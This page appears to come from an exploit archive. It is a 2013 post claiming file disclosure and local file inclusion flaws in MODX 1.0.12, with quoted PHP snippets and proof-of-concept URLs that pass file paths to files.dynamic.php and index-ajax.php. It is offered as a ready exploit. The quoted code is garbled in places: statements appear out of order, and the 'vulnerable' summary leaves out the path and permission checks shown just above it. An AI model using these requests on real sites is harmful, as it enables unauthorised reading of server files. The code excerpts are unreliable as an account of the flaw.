facebook facebook twitter rss

MODX Local LFI & File Disclosure

Author: JoKeR_StEx , Published: 08-12-2013
##################################################
# Ecploit title : MODX Local LFI & File Disclosure
# Author : JoKeR_StEx
# Version : 1.0.12
# Download Software Link : http://modx.com/download/
# DaTe : 08/12/2013
###################################################
1/File Disclosure
<?...
....
file_get_contents $buffer = file_get_contents ($filename);

$filename = $_REQUEST['path'];
$_REQUEST['path'] = str_replace('..', '', $_REQUEST['path']);
....<?
//
127.0.0.1/modx/manager/actions/files.dynamic.php?path=[File]

2/ LFI :
<?.....
....
if($axhandler = (strtoupper($_SERVER['REQUEST_METHOD'])=='GET') ? $_GET['q'] : $_POST['q'])
{
$axhandler = preg_replace('/[^A-Za-z0-9_\-\.\/]/', '', $axhandler);

// Get realpath

$axhandler = realpath(MODX_BASE_PATH.$axhandler) or die(); // full

$axhandler = str_replace('\\','/',$axhandler);

$axhandler_rel = substr($axhandler, strlen(MODX_BASE_PATH)); // relative

//$axhandler = realpath($directory.str_replace($directory, '', $axhandler));


if ($axhandler_rel && strtolower(substr($axhandler_rel, -4)) == '.php') {
// permission check

$allowed = false;
foreach($allowed_dirs as $allowed_dir) {

if (substr($axhandler_rel, 0, strlen($allowed_dir)) == $allowed_dir) {

$allowed = true;

break;
}

}

if ($allowed) {

include_once($axhandler);

}


}


}
The Vulns Code :
if($axhandler = (strtoupper($_SERVER['REQUEST_METHOD'])=='GET') ? $_GET['q'] : $_POST['q'])
include_once($axhandler);

....
<?
//
127.0.0.1/modx/index-ajax.php?q=[file]

The End ^__^
###########################################################################################

Like us on Facebook :